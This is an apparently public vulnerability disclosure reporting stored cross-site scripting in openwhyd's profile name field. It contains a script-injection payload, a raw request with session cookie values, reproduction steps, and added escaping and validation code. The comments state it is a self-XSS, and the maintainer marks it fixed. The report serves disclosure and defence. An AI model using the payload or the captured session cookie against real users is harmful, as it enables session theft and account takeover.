Cross-site Scripting (XSS) - Stored in openwhyd/openwhyd


Reported on

Oct 17th 2021


The openwhyd open-source application and are vulnerable to a stored cross-site scripting vulnerability via user profiles. Malicious users can inject arbitrary JavaScript into the username setting on their profiles which, when visited by external users, would execute JavaScript in victim browsers. This is a serious vulnerability and should be triaged immediately to protect users.

Proof of Concept

Payload in browser:

John Doe "><script src=></script>

Payload in request:

POST /api/user HTTP/2
Cookie: _ga=GA1.2.1710874691.1634429460; _gid=GA1.2.32803653.1634429460; cookieconsent_status=dismiss; whydSid=s%3ACvqf3Q9bbgPSn9TFbSIW5MGlgKrRMxlb.anmicGodGtyIqzLo0BPEXz0c%2BbUxjqptLCOPopLBaQY; _gat=1; _dd_s=rum=1&id=93cf7abc-e858-4a40-bd8c-71ecaa2215b9&created=1634429459651&expire=1634432938003
Content-Length: 147
Sec-Ch-Ua: ";Not A Brand";v="99", "Chromium";v="94"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

Steps to Reproduce

  1. Go to the user profile [username]
  2. Click edit profile, then edit profile info
  3. Enter the payload into the name field. This PoC uses an xsshunter payload to automatically get a call-back of when the payload triggers. The payload used was john doe"><script src=></script>
  4. Save
  5. Reload the profile, [username]
  6. The payload will execute

The vulnerable component is the user profile badge and name field, located at the top right of the page


This is a severe vulnerability. Malicious users can create profiles with embedded payloads, send links to target victims, and have their arbitrary JavaScript execute in victim browsers. Payloads could be crafted to steal authentication cookies and session information, such as whydSid, which could lead to complete account takeover.

We have contacted a member of the openwhyd team and are waiting to hear back.
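The root cause the report describes is a display name being spliced into the profile badge's markup without output encoding, so a value containing `">` closes the surrounding attribute and tag. The following is an added example, not openwhyd's own code and not the fix shipped in 1.45.5: it renders a badge the vulnerable way beside a hardened version that escapes every interpolation for its context, and adds an input check a `POST /api/user` handler could apply before storing the name. The `renderBadge*` functions, the `user` fields, the badge markup and the validation rules are all assumptions; the sample name is the report's own payload, used here as constructed test input.

```javascript
// Added example (not openwhyd's code): contextual HTML escaping for a
// user-supplied display name rendered into a profile badge. The markup,
// field names and validation rules below are assumptions for illustration.

const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

// Escape a value for insertion into HTML text or a double-quoted attribute.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable pattern (the one the report describes): the name is spliced
// into markup as-is, so a name containing `">` closes the attribute and the
// tag, and everything after it is parsed as new markup by the browser.
function renderBadgeUnsafe(user) {
  return `<a class="badge" href="/u/${user.id}" title="${user.name}">` +
         `<img src="${user.avatarUrl}" alt="${user.name}">` +
         `<span>${user.name}</span></a>`;
}

// Hardened pattern: every interpolated value is encoded for the context it
// lands in (URL path segment, attribute value, text node).
function renderBadgeSafe(user) {
  const name = escapeHtml(user.name);           // attribute + text context
  const id = encodeURIComponent(user.id);       // path segment context
  const avatar = escapeHtml(user.avatarUrl);    // attribute context
  return `<a class="badge" href="/u/${id}" title="${name}">` +
         `<img src="${avatar}" alt="${name}">` +
         `<span>${name}</span></a>`;
}

// Defence in depth for the profile-update handler (hypothetical rule set):
// reject names that can never be legitimate instead of relying on output
// encoding alone. Output encoding remains the primary control.
const MAX_NAME_LENGTH = 64;
function validateDisplayName(name) {
  if (typeof name !== 'string' || name.trim().length === 0) {
    return { ok: false, reason: 'empty' };
  }
  if (name.length > MAX_NAME_LENGTH) {
    return { ok: false, reason: 'too long' };
  }
  if (/[<>\u0000-\u001f]/.test(name)) {
    return { ok: false, reason: 'markup or control characters' };
  }
  return { ok: true, reason: null };
}

// Count <script opening tags in a rendered fragment. The badge template
// contains none, so any hit came from user data (useful as a unit-test or
// template-linting check for this component).
function countScriptTags(html) {
  return (html.match(/<script\b/gi) || []).length;
}

// Constructed sample: the report's payload stored as a display name.
const SAMPLE_USER = {
  id: 'u-123',
  name: 'John Doe "><script src=></script>',
  avatarUrl: '/img/avatar.png',
};

function demo() {
  return {
    unsafe: renderBadgeUnsafe(SAMPLE_USER),
    safe: renderBadgeSafe(SAMPLE_USER),
    validation: validateDisplayName(SAMPLE_USER.name),
  };
}
```

Running `demo()` shows the unescaped badge containing live `<script` tags (one per interpolation of the name) while the escaped badge contains none, and the validator rejecting the sample name before it is ever stored. Whether the badge renders the viewer's own name or another user's, the same encoding rule applies wherever the name is interpolated.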
Tyler Butler
2 years ago


I just noticed, this is apparently a self XSS, the payload executes on [user] only when that [user] is logged in. The vulnerable component is not used when a victim opens a vulnerable [user] profile because the component is used as the "logged in" user's avatar. It's still likely the same logic was used elsewhere in the application

Tyler Butler modified the report
2 years ago
Adrien Joly validated this vulnerability 2 years ago
Tyler Butler has been awarded the disclosure bounty
The fix bounty is now up for grabs
Adrien Joly
2 years ago


Thank you for reporting, Tyler, and for the precise explanation of the problem + steps to reproduce it! Would you be interested in submitting a fix through a pull request?

Adrien Joly marked this as fixed in 1.45.5 with commit 14e0d4 2 years ago
Adrien Joly has been awarded the fix bounty
This vulnerability will not receive a CVE